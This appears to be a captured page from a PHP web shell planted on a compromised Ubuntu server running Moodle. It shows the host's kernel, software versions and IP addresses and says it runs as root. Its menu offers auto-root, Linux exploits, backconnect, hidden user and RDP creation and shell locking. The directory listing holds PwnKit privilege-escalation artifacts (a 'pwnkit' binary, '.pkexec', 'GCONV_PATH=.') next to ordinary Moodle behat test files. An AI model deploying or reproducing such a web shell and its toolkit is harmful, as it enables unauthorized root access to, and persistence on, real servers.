Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.31
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
moodle /
lib /
tests /
behat /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
action_menu.feature
1.11
KB
-rwxrwxrwx
action_modal.feature
2.19
KB
-rwxrwxrwx
alpha_chooser.feature
21.29
KB
-rwxrwxrwx
app_behat_runtime.js
24.63
KB
-rwxrwxrwx
behat_action_menu.php
8.02
KB
-rwxrwxrwx
behat_app.php
21.51
KB
-rwxrwxrwx
behat_data_generators.php
9.71
KB
-rwxrwxrwx
behat_deprecated.php
6.48
KB
-rwxrwxrwx
behat_filters.php
2.95
KB
-rwxrwxrwx
behat_forms.php
29.89
KB
-rwxrwxrwx
behat_general.php
89.95
KB
-rwxrwxrwx
behat_hooks.php
33.02
KB
-rwxrwxrwx
behat_navigation.php
45.76
KB
-rwxrwxrwx
behat_permissions.php
12.47
KB
-rwxrwxrwx
behat_transformations.php
5.56
KB
-rwxrwxrwx
datetime_any.feature
4.09
KB
-rwxrwxrwx
largeforms.feature
4.45
KB
-rwxrwxrwx
locking.feature
8.26
KB
-rwxrwxrwx
min_max_version.feature
1
KB
-rwxrwxrwx
permissionmanager.feature
2.61
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
readonlyform.feature
1.63
KB
-rwxrwxrwx
securelayout.feature
1.68
KB
-rwxrwxrwx
timezone.feature
431
B
-rwxrwxrwx
userfeedback.feature
2.21
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : action_menu.feature
@core Feature: Navigate action menu In order to navigate an action menu As a user I need to be able to use the keyboard @javascript Scenario: The menu does not close on keyboard navigation When I log in as "admin" # Click to open the user menu. And I click on ".usermenu a.toggle-display" "css_element" in the ".usermenu" "css_element" # The menu should now be visible. Then ".usermenu [role='menu']" "css_element" should be visible # Press down arrow. And I press the down key # The menu should still be visible. And ".usermenu [role='menu']" "css_element" should be visible @javascript Scenario: The menu closes when it clicked outside When I log in as "admin" # Click to open the user menu. And I click on ".usermenu a.toggle-display" "css_element" in the ".usermenu" "css_element" # The menu should now be visible. Then ".usermenu [role='menu']" "css_element" should be visible # Click outside the menu. And I click on "adminsearchquery" "field" # The menu should now be hidden. And ".usermenu [role='menu']" "css_element" should not be visible
Close